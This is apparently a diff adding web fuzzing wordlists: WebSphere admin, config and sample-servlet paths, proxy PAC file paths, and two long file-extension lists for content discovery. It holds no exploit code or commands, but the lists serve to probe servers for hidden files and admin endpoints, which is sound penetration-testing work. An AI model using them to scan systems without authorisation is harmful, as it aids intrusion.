+/TechnologySamples/MovieReview2_0
+/TechnologySamples/MovieReview2_0/*
+/TechnologySamples/MovieReview2_1
+/TechnologySamples/MovieReview2_1/*
+/TechnologySamples/PageReturner
+/TechnologySamples/PageReturner/*
+/TechnologySamples/PageReturnerservlet
+/TechnologySamples/PageReturnerservlet/*
+/TechnologySamples/ReadingList
+/TechnologySamples/ReadingList/*
+/TechnologySamples/SimpleJSP
+/TechnologySamples/SimpleJSP/*
+/TechnologySamples/SimpleServlet
+/TechnologySamples/SimpleServlet/*
+/TechnologySamples/Subscription
+/TechnologySamples/Subscription/*
+/TechnologySamples/Subscriptionservlet
+/TechnologySamples/Subscriptionservlet/*
+/TechnologySamples/Taglib
+/TechnologySamples/Taglib/*
+/TechnologySamples/docs
+/WEB-INF
+/WEB-INF./web.xml
+/WEB-INF/web.xml
+/WSsamples
+/WSsamples/*
+/WSsamples/de
+/WSsamples/de/*
+/WSsamples/en
+/WSsamples/en/*
+/WSsamples/es
+/WSsamples/es/*
+/WSsamples/fr
+/WSsamples/fr/*
+/WSsamples/index.jsp
+/WSsamples/it
+/WSsamples/it/*
+/WSsamples/ja
+/WSsamples/ja/*
+/WSsamples/ko
+/WSsamples/ko/*
+/WSsamples/pt_br
+/WSsamples/pt_br/*
+/WSsamples/zh_cn
+/WSsamples/zh_cn/*
+/WSsamples/zh_tw
+/WSsamples/zh_tw/*
+/WarehouseEJB/*.jsp
+/WarehouseEJB/*.jsv
+/WarehouseEJB/*.jsw
+/WarehouseEJB/services/WarehouseFront
+/WarehouseEJB/services/WarehouseFront/wsdl/*
+/WarehouseWeb
+/WarehouseWeb/*
+/WarehouseWebservlet
+/WarehouseWebservlet/*
+/WebServicesSamples/docs/*
+/WebSphere
+/WebSphereBank
+/WebSphereBank/*
+/WebSphereBank/docs/*
+/WebSphereBankDeposit
+/WebSphereBankDeposit/*
+/WebSphereBankDepositservlet
+/WebSphereBankDepositservlet/*
+/WebSphereBankservlet
+/WebSphereBankservlet/*
+/WebSphereSamples
+/WebSphereSamples.Configuration.config
+/WebSphereSamples/
+/WebSphereSamples/SingleSamples/AccountAndTransfer/create.html
+/WebSphereSamples/SingleSamples/Increment/increment.html
+/WebSphereSamples/YourCo/main.html
+/_DynaCacheEsi
+/_DynaCacheEsi/*
+/_DynaCacheEsi/esiInvalidator
+/ab/*
+/ab/docs/*
+/activitysessions/docs/*
+/addNodeListener
+/admin
+/admin-authz.xml
+/admin.conf
+/admin.passwd
+/admin/*
+/admin/logon.jsp
+/admin/secure/logon.jsp
+/apadminred
+/apadminred.html
+/aphtpasswd.html
+/asynchbeans/*
+/asynchbeans/docs/*
+/cachemonitor
+/cachemonitor/statistics.jsp
+/cell.xml
+/cells
+/cgi-bin
+/cgi-bin/
+/com.ibm.ws.console.events
+/com.ibm.ws.console.events/runtime_messages.jsp
+/config
+/console
+/debug_error.jsp
+/error
+/error.jsp
+/esiInavlidator
+/estore
+/estore/annotated-index.html
+/estore/index.html
+/estore/populate
+/examples
+/hello
+/helloEJB
+/hitcount
+/httpd.conf
+/i18nctxSample
+/i18nctxSample/*
+/i18nctxSample/docs/*
+/ibm
+/ibm/console
+/ibm_security_logout
+/icons
+/images
+/index.html
+/index.jsp
+/ivt
+/ivt/*
+/ivt/ivtDate.jsp
+/ivt/ivtejb
+/ivt/ivtservler
+/ivt/ivtservlet
+/ivtejb
+/ivtserver
+/ivtservlet
+/j_security_check
+/jsp
+/login.html
+/manual
+/manual/index.html
+/node.xml
+/nodes
+/opc/*.jsp
+/opc/*.jsv
+/opc/*.jsw
+/opc/services/BrokerServiceIntfPort
+/opc/services/BrokerServiceIntfPort/wsdl/*
+/opc/services/OrderTrackingIntfPort
+/opc/services/OrderTrackingIntfPort/wsdl/*
+/opc/services/PurchaseOrderIntfPort
+/opc/services/PurchaseOrderIntfPort/wsdl/*
+/opt
+/petstore
+/petstore/*
+/ping
+/removeNodeListener
+/resources.xml
+/runtime_messages.jsp
+/samples/activitysessions
+/samples/activitysessions/*
+/scheduler
+/scheduler/*
+/scheduler/docs/*
+/scripts
+/secure/downloadFile/*
+/securecleanup
+/security.xml
+/server-info
+/server-status
+/server.xml
+/serverindex.xml
+/servers
+/servlet
+/servlet/*
+/servlet/ControllerServlet
+/servlet/ErrorReporter
+/servlet/HelloWorldServlet
+/servlet/HitCount
+/servlet/SimpleServlet
+/servlet/SnoopServlet
+/servlet/TheExpiringHTMLServlet
+/servlet/WebSphereSamples.Configuration.config
+/servlet/WebSphereSamples.Form.FormServlet
+/servlet/WebSphereSamples.YourCo.News.NewsServlet
+/servlet/aphtpassword
+/servlet/com.ibm.as400ad.webfacing.runtime.httpcontroller.ControllerServlet
+/servlet/com.ibm.servlet.engine.webapp.DefaultErrorReporter
+/servlet/com.ibm.servlet.engine.webapp.InvokerServlet
+/servlet/com.ibm.servlet.engine.webapp.SimpleFileServlet
+/servlet/com.ibm.servlet.engine.webapp.UncaughtServletException
+/servlet/com.ibm.servlet.engine.webapp.WebAppErrorReport
+/servlet/hello
+/servlet/snoop
+/servlet/snoop2
+/servletcache
+/showCfg
+/sibstatus
+/simple.jsp
+/simpleJSP
+/snoop
+/snoop/*
+/snoop2
+/statistics.jsp
+/status
+/statuspoll
+/theme
+/tradetheme
+/transfer
+/uddigui/*
+/uddisoap/*
+/variables.xml
+/very_simple.jsp
+/virtualhosts.xml
+/wasPerfTool
+/wasPerfTool/*
+/wasPerfToolservlet
+/wasPerfToolservlet/*
+/web.xml
+/webapp
+/webapp/examples/ErrorServlet
+/webapp/examples/HelloPervasive
+/webapp/examples/HitCount
+/webapp/examples/SourceCodeViewer
+/webapp/examples/login.html
+/webapp/examples/ping
+/webapp/examples/showCfg
+/webapp/examples/showcfg
+/webapp/examples/simple.jsp
+/webapp/examples/verify
+/webexec
+/workarea/*
+/workarea/docs/*
+/

Discovery/proxy-conf.fuzz.txt

@@ -0,0 +1,31 @@
+/pac/
+/proxy/
+/.pac/
+/managers/
+/admin/
+/employees/
+/users/
+/proxy/pac/
+.pac
+proxy.pac
+/.pac/.pac
+/.pac/proxy.pac
+/proxy/.pac
+/proxy/proxy.pac
+/pac/.pac
+/pac/proxy.pac
+/managers/.pac
+/managers/proxy.pac
+/admin/.pac
+/admin/proxy.pac
+/employees/.pac
+/employees/proxy.pac
+/users/.pac
+/users/proxy.pac
+/proxy/pac/proxy.pac
+/proxy/pac/.pac
+users.pac
+admin.pac
+managers.pac
+employees.pac
+guest.pac

Discovery/raft-small-extensions-lowercase.txt

@@ -0,0 +1,914 @@
+.php
+.html
+.txt
+.htm
+.aspx
+.asp
+.js
+.css
+.pgsql.txt
+.mysql.txt
+.pdf
+.cgi
+.inc
+.gif
+.jpg
+.swf
+.xml
+.cfm
+.xhtml
+.wmv
+.zip
+.axd
+.gz
+.png
+.doc
+.shtml
+.jsp
+.ico
+.exe
+.csi
+.inc.php
+.config
+.jpeg
+.ashx
+.log
+.xls
+.0
+.old
+.mp3
+.com
+.tar
+.ini
+.asa
+.tgz
+.flv
+.php3
+.bak
+.rar
+.asmx
+.xlsx
+.page
+.phtml
+.dll
+.asax
+.1
+.msg
+.pl
+.csv
+.css.aspx
+.2
+.3
+.ppt
+.nsf
+.bmp
+.sql
+.xml.gz
+.new
+.avi
+.psd
+.rss
+.5
+.wav
+.action
+.db
+.dat
+.do
+.xsl
+.class
+.mdb
+.include
+.12
+.cs
+.class.php
+.htc
+.mov
+.tpl
+.4
+.6.12
+.9
+.js.php
+.mysql-connect
+.mpg
+.rdf
+.rtf
+.6
+.ascx
+.mvc
+.1.0
+.files
+.master
+.jar
+.vb
+.mp4
+.local.php
+.fla
+.require
+.de
+.docx
+.php5
+.wci
+.readme
+.7
+.cfg
+.aspx.cs
+.cfc
+.dwt
+.ru
+.lck
+.gif_var_de
+.html_var_de
+.net
+.ttf
+.x-aom
+.jhtml
+.mpeg
+.x-fancycat
+.php4
+.readme_var_de
+.vcf
+.x-rma
+.x-affiliate
+.x-offers
+.x-affiliate_var_de
+.x-aom_var_de
+.x-fancycat_var_de
+.x-fcomp
+.x-fcomp_var_de
+.x-giftreg
+.x-giftreg_var_de
+.x-magnifier
+.x-magnifier_var_de
+.x-offers_var_de
+.x-pconf
+.x-pconf_var_de
+.x-rma_var_de
+.x-survey
+.tif
+.dir
+.json
+.6.9
+.zif
+.wma
+.8
+.mid
+.rm
+.aspx.vb
+.tar.gz
+.woa
+.main
+.ram
+.opml
+.0.html
+.css.php
+.feed
+.lasso
+.6.3
+.shtm
+.sitemap
+.scc
+.tmp
+.backup
+.sln
+.org
+.conf
+.mysql-query
+.session-start
+.uk
+.10
+.14
+.orig
+.settings.php
+.19
+.cab
+.kml
+.pps
+.require-once
+.asx
+.bok
+.msi
+.01
+.c
+.fcgi
+.fopen
+.html.
+.phpmailer.php
+.bin
+.htaccess
+.info
+.java
+.jsf
+.tmpl
+.0.2
+.00
+.6.19
+.bat
+.com.html
+.print
+.resx
+.ics
+.php.php
+.x
+.data
+.dcr
+.enfinity
+.html.html
+.licx
+.mno
+.plx
+.vm
+.11
+.5.php
+.50
+.config.php
+.dwg
+.edu
+.search
+.static
+.wws
+.6.edu
+.bz2
+.co.uk
+.ece
+.epc
+.getimagesize
+.ice
+.it_backup_giornaliero
+.it_backup_settimanale
+.jspa
+.lst
+.php-dist
+.svc
+.vbs
+.1.html
+.30-i486
+.ai
+.cur
+.dmg
+.img
+.inf
+.seam
+.smtp.php
+.1-bin-linux-2.0.30-i486
+.1a
+.34
+.5.3
+.7z
+.ajax
+.cfm.cfm
+.chm
+.csp
+.edit
+.file
+.gif.php
+.m3u
+.psp
+.py
+.sh
+.test
+.zdat
+.04
+.2.2
+.4.0
+.admin
+.captcha.aspx
+.dev
+.eps
+.file-get-contents
+.fr
+.fsockopen
+.list
+.m4v
+.min.js
+.new.html
+.p
+.store
+.webinfo
+.xml.php
+.3.2
+.5.0
+.htm.
+.php.bak
+.1.1
+.1c
+.300
+.5.1
+.790
+.826
+.bk
+.bsp
+.cms
+.csshandler.ashx
+.d
+.html,
+.htmll
+.idx
+.images
+.jad
+.master.cs
+.prev_next
+.ssf
+.stm
+.txt.gz
+.00.8169
+.01.4511
+.112
+.134
+.156
+.2.0
+.21
+.24
+.4.9.php
+.4511
+.8169
+.969
+.web.ui.webresource.axd
+.as
+.asp.asp
+.au
+.cnf
+.dhtml
+.enu
+.html.old
+.include-once
+.lock
+.m
+.mysql-select-db
+.phps
+.pm
+.pptx
+.sav
+.sendtoafriendform
+.ssi
+.suo
+.vbproj
+.wml
+.xsd
+.025
+.075
+.077
+.083
+.13
+.16
+.206
+.211
+.246
+.26.13.391n35.50.38.816
+.26.24.165n35.50.24.134
+.26.56.247n35.52.03.605
+.27.02.940n35.49.56.075
+.27.15.919n35.52.04.300
+.27.29.262n35.47.15.083
+.367
+.3gp
+.40.00.573n35.42.57.445
+.403
+.43.58.040n35.38.35.826
+.44.04.344n35.38.35.077
+.44.08.714n35.39.08.499
+.44.10.892n35.38.49.246
+.44.27.243n35.41.29.367
+.44.29.976n35.37.51.790
+.44.32.445n35.36.10.206
+.44.34.800n35.38.08.156
+.44.37.128n35.40.54.403
+.44.40.556n35.40.53.025
+.44.45.013n35.38.36.211
+.44.46.104n35.38.22.970
+.44.48.130n35.38.25.969
+.44.52.162n35.38.50.456
+.44.58.315n35.38.53.455
+.445
+.45.01.562n35.38.38.778
+.45.04.359n35.38.39.112
+.45.06.789n35.38.22.556
+.45.10.717n35.38.41.989
+.455
+.456
+.499
+.556
+.605
+.778
+.816
+.970
+.989
+.array-keys
+.atom
+.award
+.bkp
+.crt
+.default
+.eml
+.epl
+.fancybox
+.fil
+.geo
+.h
+.hmtl
+.html.bak
+.ida
+.implode
+.index.php
+.iso
+.kmz
+.mysql-pconnect
+.php.old
+.php.txt
+.rec
+.storefront
+.taf
+.war
+.xslt
+.1.6
+.15
+.23
+.2a
+.8.1
+.sponsors
+.a
+.aquery
+.ascx.cs
+.cat
+.contrib
+.ds
+.dwf
+.film
+.g
+.go
+.googlebook
+.gpx
+.hotelname
+.htm.htm
+.ihtml
+.in-array
+.index
+.ini.php
+.layer
+.maninfo
+.odt
+.price
+.randomhouse
+.read
+.ru-tov.html
+.s7
+.sample
+.sit
+.src
+.tpl.php
+.trck
+.uguide
+.vorteil
+.wbp
+.2.1
+.2.html
+.3.1
+.30
+.asax.vb
+.aspx.aspx
+.btr
+.cer
+.common.php
+.de.html
+.html‎
+.jbf
+.lbi
+.lib.php
+.lnk
+.login
+.login.php
+.mhtml
+.mpl
+.mso
+.mysql-result
+.original
+.pgp
+.ph
+.php.
+.preview
+.preview-content.php
+.search.htm
+.site
+.text
+.view
+.0.1
+.0.5
+.1.2
+.2.9
+.3.5
+.3.html
+.4.html
+.5.html
+.72
+.web
+.action2
+.asc
+.asp.bak
+.aspx.resx
+.browse
+.code
+.com_backup_giornaliero
+.com_backup_settimanale
+.csproj
+.dtd
+.en.html
+.ep
+.eu
+.form
+.html1
+.inc.asp
+.index.html
+.it
+.nl
+.ogg
+.old.php
+.old2
+.opendir
+.out
+.pgt
+.php,
+.php‎
+.po
+.prt
+.query
+.rb
+.rhtml
+.ru.html
+.save
+.search.php
+.t
+.wsdl
+.0-to1.2.php
+.0.3
+.03
+.18
+.2.6
+.3.0
+.3.4
+.4.1
+.6.1
+.7.2
+.templates
+.adp
+.ajax.php
+.apsx
+.asf
+.bck
+.bu
+.calendar
+.captcha
+.cart
+.com.crt
+.core
+.dict.php
+.dot
+.egov
+.en.php
+.eot
+.errors
+.f4v
+.fr.html
+.git
+.ht
+.hta
+.html.lck
+.html.printable
+.ini.sample
+.lib
+.lic
+.map
+.master.vb
+.mi
+.mkdir
+.o
+.p7b
+.pac
+.parse.errors
+.pd
+.pfx
+.php2
+.php_files
+.phtm
+.png.php
+.portal
+.printable
+.psql
+.pub
+.q
+.ra
+.reg
+.restrictor.php
+.rpm
+.strpos
+.tcl
+.template
+.tiff
+.tv
+.us
+.user
+.06
+.09
+.1.3
+.1.5.swf
+.2.3
+.25
+.3.3
+.4.2
+.6.5
+.controls
+.acgi
+.alt
+.array-merge
+.back
+.call-user-func-array
+.cfml
+.cmd
+.cocomore.txt
+.detail
+.disabled
+.dist.php
+.djvu
+.dta
+.e
+.extract
+.file-put-contents
+.fpl
+.framework
+.fread
+.htm.lck
+.inc.js
+.includes
+.jp
+.jpg.html
+.l
+.letter
+.local
+.num
+.pem
+.php.sample
+.php}
+.php~
+.pot
+.preg-match
+.process
+.ps
+.r
+.raw
+.rc
+.s
+.search.
+.server
+.sis
+.sql.gz
+.squery
+.subscribe
+.svg
+.svn
+.thtml
+.tpl.html
+.ua
+.vcs
+.xhtm
+.xml.asp
+.xpi
+.0.0
+.0.4
+.07
+.08
+.10.html
+.17
+.2008
+.2011
+.22
+.25.html
+.2ms2
+.3.2.min.js
+.32
+.33
+.4.6
+.5.6
+.6.0
+.7.1
+.91
+.add
+.array-rand
+.asax.cs
+.asax.resx
+.ascx.vb
+.aspx,
+.aspx.
+.awm
+.b
+.bhtml
+.bml
+.ca
+.cache
+.cfg.php
+.cn
+.cz
+.de.txt
+.diff
+.email
+.en
+.error
+.faces
+.filesize
+.functions.php
+.hml
+.hqx
+.html,404
+.html.php
+.htmls
+.htx
+.i
+.idq
+.jpe
+.js.aspx
+.js.gz
+.jspf
+.load
+.media
+.mp2
+.mspx
+.mv
+.mysql
+.new.php
+.ocx
+.oui
+.outcontrol
+.pad
+.pages
+.pdb
+.pdf.
+.pnp
+.pop_formata_viewer
+.popup.php
+.popup.pop_formata_viewer
+.pvk
+.restrictor.log
+.results
+.run
+.scripts
+.sdb
+.ser
+.shop
+.sitemap.xml
+.smi
+.start
+.ste
+.swf.swf
+.textsearch
+.torrent
+.unsubscribe
+.v
+.vbproj.webinfo
+.wmf
+.wpd
+.ws
+.xpml
+.y
+.0.8
+.0.pdf
+.001
+.1-all-languages
+.1.pdf
+.11.html
+.125
+.20
+.20.html
+.2007
+.26.html
+.4.7
+.45
+.5.4
+.6.2
+.6.html
+.7.0
+.7.3
+.7.html
+.75.html
+.8.2
+.8.3
+.adcode
+.c.
+.getmapimage
+.run.adcode
+.skins
+.z
+.access.login
+.ajax.asp
+.app
+.asd
+.asm
+.assets
+.at
+.bad
+.bak2
+.blog
+.casino
+.cc
+.cdr
+.changelang.php
+.children
+.com,
+.com-redirect
+.content
+.copy
+.count
+.cp
+.csproj.user
+.custom
+.dbf
+.deb
+.delete
+.details.php
+.dic
+.divx
+.download
+.download.php
+.downloadcirrequirements.pdf
+.downloadtourkitrequirements.pdf
+.emailcirrequirements.php
+.emailtourkitform.php
+.emailtourkitnotification.php
+.emailtourkitrequirements.php
+.epub
+.err
+.es
+.exclude
+.filemtime
+.fillpurposes2.php
+.grp
+.home
+.htlm
+.htm,
+.html-
+.image
+.inc.html
+.it.html
+.j
+.jnlp
+.js.asp
+.js2
+.jspx
+.lang-en.php
+.link
+.listevents
+.log.0
+.mbox
+.mc_id
+.menu.php
+.mgi
+.mod
+.net.html
+.news
+.none
+.off
+.p3p
+.php.htm
+.php.static
+.php1
+.phpp
+.pop3.php
+.pop_3d_viewer
+.popup.pop_3d_viewer
+.prep
+.prg
+.print.html
+.print.php
+.product_details
+.pwd
+.pyc
+.red
+.registration
+.requirementsfeestable.php
+.roshani-gunewardene.com
+.se
+.sea
+.sema
+.session
+.setup
+.simplexml-load-file
+.sitx
+.smil
+.srv
+.swi
+.swp
+.sxw
+.tar.bz2
+.tem
+.temp
+.template.php
+.top
+.txt.php
+.types
+.unlink
+.url
+.userloginpopup.php
+.visapopup.php
+.visapopupvalid.php
+.vspscc
+.vssscc
+.w
+.work
+.wvx
+.xspf

Discovery/raft-small-extensions.txt

@@ -0,0 +1,963 @@
+.php
+.html
+.txt
+.htm
+.aspx
+.asp
+.js
+.css
+.pgsql.txt
+.mysql.txt
+.pdf
+.cgi
+.inc
+.gif
+.jpg
+.swf
+.xml
+.cfm
+.xhtml
+.wmv
+.zip
+.axd
+.gz
+.png
+.doc
+.shtml
+.jsp
+.ico
+.exe
+.csi
+.inc.php
+.config
+.jpeg
+.ashx
+.log
+.xls
+.0
+.old
+.mp3
+.com
+.tar
+.ini
+.asa
+.tgz
+.PDF
+.flv
+.php3
+.bak
+.rar
+.asmx
+.xlsx
+.page
+.phtml
+.dll
+.JPG
+.asax
+.1
+.msg
+.pl
+.GIF
+.ZIP
+.csv
+.css.aspx
+.2
+.JPEG
+.3
+.ppt
+.nsf
+.Pdf
+.Gif
+.bmp
+.sql
+.Jpeg
+.Jpg
+.xml.gz
+.Zip
+.new
+.avi
+.psd
+.rss
+.5
+.wav
+.action
+.db
+.dat
+.do
+.xsl
+.class
+.mdb
+.include
+.12
+.cs
+.class.php
+.htc
+.mov
+.tpl
+.4
+.6.12
+.9
+.js.php
+.mysql-connect
+.mpg
+.rdf
+.rtf
+.6
+.ascx
+.mvc
+.1.0
+.files
+.master
+.jar
+.vb
+.mp4
+.local.php
+.fla
+.require
+.de
+.docx
+.php5
+.wci
+.readme
+.7
+.cfg
+.aspx.cs
+.cfc
+.dwt
+.ru
+.LCK
+.Config
+.gif_var_DE
+.html_var_DE
+.net
+.ttf
+.HTM
+.X-AOM
+.jhtml
+.mpeg
+.ASP
+.LOG
+.X-FANCYCAT
+.php4
+.readme_var_DE
+.vcf
+.X-RMA
+.X-AFFILIATE
+.X-OFFERS
+.X-AFFILIATE_var_DE
+.X-AOM_var_DE
+.X-FANCYCAT_var_DE
+.X-FCOMP
+.X-FCOMP_var_DE
+.X-GIFTREG
+.X-GIFTREG_var_DE
+.X-MAGNIFIER
+.X-MAGNIFIER_var_DE
+.X-OFFERS_var_DE
+.X-PCONF
+.X-PCONF_var_DE
+.X-RMA_var_DE
+.X-SURVEY
+.tif
+.dir
+.json
+.6.9
+.Zif
+.wma
+.8
+.mid
+.rm
+.aspx.vb
+.tar.gz
+.woa
+.main
+.ram
+.opml
+.0.html
+.css.php
+.feed
+.lasso
+.6.3
+.shtm
+.sitemap
+.scc
+.tmp
+.backup
+.sln
+.org
+.conf
+.mysql-query
+.session-start
+.uk
+.10
+.14
+.TXT
+.orig
+.settings.php
+.19
+.cab
+.kml
+.lck
+.pps
+.require-once
+.asx
+.bok
+.msi
+.01
+.c
+.fcgi
+.fopen
+.html.
+.phpmailer.php
+.bin
+.htaccess
+.info
+.java
+.jsf
+.tmpl
+.0.2
+.00
+.6.19
+.DOC
+.bat
+.com.html
+.print
+.resx
+.ics
+.php.php
+.x
+.PNG
+.data
+.dcr
+.enfinity
+.html.html
+.licx
+.mno
+.plx
+.vm
+.11
+.5.php
+.50
+.HTML
+.MP3
+.config.php
+.dwg
+.edu
+.search
+.static
+.wws
+.6.edu
+.OLD
+.bz2
+.co.uk
+.ece
+.epc
+.getimagesize
+.ice
+.it_Backup_Giornaliero
+.it_Backup_Settimanale
+.jspa
+.lst
+.php-dist
+.svc
+.vbs
+.1.html
+.30-i486
+.ai
+.cur
+.dmg
+.img
+.inf
+.seam
+.smtp.php
+.1-bin-Linux-2.0.30-i486
+.1a
+.34
+.5.3
+.7z
+.ajax
+.cfm.cfm
+.chm
+.csp
+.edit
+.file
+.gif.php
+.m3u
+.psp
+.py
+.sh
+.test
+.zdat
+.04
+.2.2
+.4.0
+.admin
+.captcha.aspx
+.dev
+.eps
+.file-get-contents
+.fr
+.fsockopen
+.list
+.m4v
+.min.js
+.new.html
+.p
+.store
+.webinfo
+.xml.php
+.3.2
+.5.0
+.BAK
+.htm.
+.php.bak
+.1.1
+.1c
+.300
+.5.1
+.790
+.826
+.bk
+.bsp
+.cms
+.csshandler.ashx
+.d
+.html,
+.htmll
+.idx
+.images
+.jad
+.master.cs
+.prev_next
+.ssf
+.stm
+.txt.gz
+.00.8169
+.01.4511
+.112
+.134
+.156
+.2.0
+.21
+.24
+.4.9.php
+.4511
+.8169
+.969
+.Web.UI.WebResource.axd
+.as
+.asp.asp
+.au
+.cnf
+.dhtml
+.enu
+.html.old
+.include-once
+.lock
+.m
+.mysql-select-db
+.phps
+.pm
+.pptx
+.sav
+.sendtoafriendform
+.ssi
+.suo
+.vbproj
+.wml
+.xsd
+.025
+.075
+.077
+.083
+.13
+.16
+.206
+.211
+.246
+.26.13.391N35.50.38.816
+.26.24.165N35.50.24.134
+.26.56.247N35.52.03.605
+.27.02.940N35.49.56.075
+.27.15.919N35.52.04.300
+.27.29.262N35.47.15.083
+.367
+.3gp
+.40.00.573N35.42.57.445
+.403
+.43.58.040N35.38.35.826
+.44.04.344N35.38.35.077
+.44.08.714N35.39.08.499
+.44.10.892N35.38.49.246
+.44.27.243N35.41.29.367
+.44.29.976N35.37.51.790
+.44.32.445N35.36.10.206
+.44.34.800N35.38.08.156
+.44.37.128N35.40.54.403
+.44.40.556N35.40.53.025
+.44.45.013N35.38.36.211
+.44.46.104N35.38.22.970
+.44.48.130N35.38.25.969
+.44.52.162N35.38.50.456
+.44.58.315N35.38.53.455
+.445
+.45.01.562N35.38.38.778
+.45.04.359N35.38.39.112
+.45.06.789N35.38.22.556
+.45.10.717N35.38.41.989
+.455
+.456
+.499
+.556
+.605
+.778
+.816
+.970
+.989
+.ASPX
+.JS
+.PHP
+.array-keys
+.atom
+.award
+.bkp
+.crt
+.default
+.eml
+.epl
+.fancybox
+.fil
+.geo
+.h
+.hmtl
+.html.bak
+.ida
+.implode
+.index.php
+.iso
+.kmz
+.mysql-pconnect
+.php.old
+.php.txt
+.rec
+.storefront
+.taf
+.war
+.xslt
+.1.6
+.15
+.23
+.2a
+.8.1
+.CSS
+.NSF
+.Sponsors
+.a
+.aquery
+.ascx.cs
+.cat
+.contrib
+.ds
+.dwf
+.film
+.g
+.go
+.googlebook
+.gpx
+.hotelName
+.htm.htm
+.ihtml
+.in-array
+.index
+.ini.php
+.layer
+.maninfo
+.odt
+.price
+.randomhouse
+.read
+.ru-tov.html
+.s7
+.sample
+.sit
+.src
+.tpl.php
+.trck
+.uguide
+.vorteil
+.wbp
+.2.1
+.2.html
+.3.1
+.30
+.AVI
+.Asp
+.EXE
+.WMV
+.asax.vb
+.aspx.aspx
+.btr
+.cer
+.common.php
+.de.html
+.html‎
+.jbf
+.lbi
+.lib.php
+.lnk
+.login
+.login.php
+.mhtml
+.mpl
+.mso
+.mysql-result
+.original
+.pgp
+.ph
+.php.
+.preview
+.preview-content.php
+.search.htm
+.site
+.text
+.view
+.0.1
+.0.5
+.1.2
+.2.9
+.3.5
+.3.html
+.4.html
+.5.html
+.72
+.ICO
+.Web
+.XLS
+.action2
+.asc
+.asp.bak
+.aspx.resx
+.browse
+.code
+.com_Backup_Giornaliero
+.com_Backup_Settimanale
+.csproj
+.dtd
+.en.html
+.ep
+.eu
+.form
+.html1
+.inc.asp
+.index.html
+.it
+.nl
+.ogg
+.old.php
+.old2
+.opendir
+.out
+.pgt
+.php,
+.php‎
+.po
+.prt
+.query
+.rb
+.rhtml
+.ru.html
+.save
+.search.php
+.t
+.wsdl
+.0-to1.2.php
+.0.3
+.03
+.18
+.2.6
+.3.0
+.3.4
+.4.1
+.6.1
+.7.2
+.CFM
+.MOV
+.MPEG
+.Master
+.PPT
+.TTF
+.Templates
+.XML
+.adp
+.ajax.php
+.apsx
+.asf
+.bck
+.bu
+.calendar
+.captcha
+.cart
+.com.crt
+.core
+.dict.php
+.dot
+.egov
+.en.php
+.eot
+.errors
+.f4v
+.fr.html
+.git
+.ht
+.hta
+.html.LCK
+.html.printable
+.ini.sample
+.lib
+.lic
+.map
+.master.vb
+.mi
+.mkdir
+.o
+.p7b
+.pac
+.parse.errors
+.pd
+.pfx
+.php2
+.php_files
+.phtm
+.png.php
+.portal
+.printable
+.psql
+.pub
+.q
+.ra
+.reg
+.restrictor.php
+.rpm
+.strpos
+.tcl
+.template
+.tiff
+.tv
+.us
+.user
+.06
+.09
+.1.3
+.1.5.swf
+.2.3
+.25
+.3.3
+.4.2
+.6.5
+.Controls
+.WAV
+.acgi
+.alt
+.array-merge
+.back
+.call-user-func-array
+.cfml
+.cmd
+.cocomore.txt
+.detail
+.disabled
+.dist.php
+.djvu
+.dta
+.e
+.extract
+.file-put-contents
+.fpl
+.framework
+.fread
+.htm.LCK
+.inc.js
+.includes
+.jp
+.jpg.html
+.l
+.letter
+.local
+.num
+.pem
+.php.sample
+.php}
+.php~
+.pot
+.preg-match
+.process
+.ps
+.r
+.raw
+.rc
+.s
+.search.
+.server
+.sis
+.sql.gz
+.squery
+.subscribe
+.svg
+.svn
+.thtml
+.tpl.html
+.ua
+.vcs
+.xhtm
+.xml.asp
+.xpi
+.0.0
+.0.4
+.07
+.08
+.10.html
+.17
+.2008
+.2011
+.22
+.25.html
+.2ms2
+.3.2.min.js
+.32
+.33
+.4.6
+.5.6
+.6.0
+.7.1
+.91
+.A
+.PAGE
+.SWF
+.add
+.array-rand
+.asax.cs
+.asax.resx
+.ascx.vb
+.aspx,
+.aspx.
+.awm
+.b
+.bhtml
+.bml
+.ca
+.cache
+.cfg.php
+.cn
+.cz
+.de.txt
+.diff
+.email
+.en
+.error
+.faces
+.filesize
+.functions.php
+.hml
+.hqx
+.html,404
+.html.php
+.htmls
+.htx
+.i
+.idq
+.jpe
+.js.aspx
+.js.gz
+.jspf
+.load
+.media
+.mp2
+.mspx
+.mv
+.mysql
+.new.php
+.ocx
+.oui
+.outcontrol
+.pad
+.pages
+.pdb
+.pdf.
+.pnp
+.pop_formata_viewer
+.popup.php
+.popup.pop_formata_viewer
+.pvk
+.restrictor.log
+.results
+.run
+.scripts
+.sdb
+.ser
+.shop
+.sitemap.xml
+.smi
+.start
+.ste
+.swf.swf
+.templates
+.textsearch
+.torrent
+.unsubscribe
+.v
+.vbproj.webinfo
+.web
+.wmf
+.wpd
+.ws
+.xpml
+.y
+.0.8
+.0.pdf
+.001
+.1-all-languages
+.1.pdf
+.11.html
+.125
+.20
+.20.html
+.2007
+.26.html
+.4.7
+.45
+.5.4
+.6.2
+.6.html
+.7.0
+.7.3
+.7.html
+.75.html
+.8.2
+.8.3
+.AdCode
+.Aspx
+.C.
+.COM
+.GetMapImage
+.Html
+.Run.AdCode
+.Skins
+.Z
+.access.login
+.ajax.asp
+.app
+.asd
+.asm
+.assets
+.at
+.bad
+.bak2
+.blog
+.casino
+.cc
+.cdr
+.changeLang.php
+.children
+.com,
+.com-redirect
+.content
+.copy
+.count
+.cp
+.csproj.user
+.custom
+.dbf
+.deb
+.delete
+.details.php
+.dic
+.divx
+.download
+.download.php
+.downloadCirRequirements.pdf
+.downloadTourkitRequirements.pdf
+.emailCirRequirements.php
+.emailTourkitForm.php
+.emailTourkitNotification.php
+.emailTourkitRequirements.php
+.epub
+.err
+.es
+.exclude
+.filemtime
+.fillPurposes2.php
+.grp
+.home
+.htlm
+.htm,
+.html-
+.image
+.inc.html
+.it.html
+.j
+.jnlp
+.js.asp
+.js2
+.jspx
+.lang-en.php
+.link
+.listevents
+.log.0
+.mbox
+.mc_id
+.menu.php
+.mgi
+.mod
+.net.html
+.news
+.none
+.off
+.p3p
+.php.htm
+.php.static
+.php1
+.phpp
+.pop3.php
+.pop_3D_viewer
+.popup.pop_3D_viewer
+.prep
+.prg
+.print.html
+.print.php
+.product_details
+.pwd
+.pyc
+.red
+.registration
+.requirementsFeesTable.php
+.roshani-gunewardene.com
+.se
+.sea
+.sema
+.session
+.setup
+.simplexml-load-file
+.sitx
+.smil
+.srv
+.swi
+.swp
+.sxw
+.tar.bz2
+.tem
+.temp
+.template.php
+.top
+.txt.php
+.types
+.unlink
+.url
+.userLoginPopup.php
+.visaPopup.php
+.visaPopupValid.php
+.vspscc
+.vssscc
+.w
+.work
+.wvx
+.xspf

Discovery/tftp.fuzz.txt

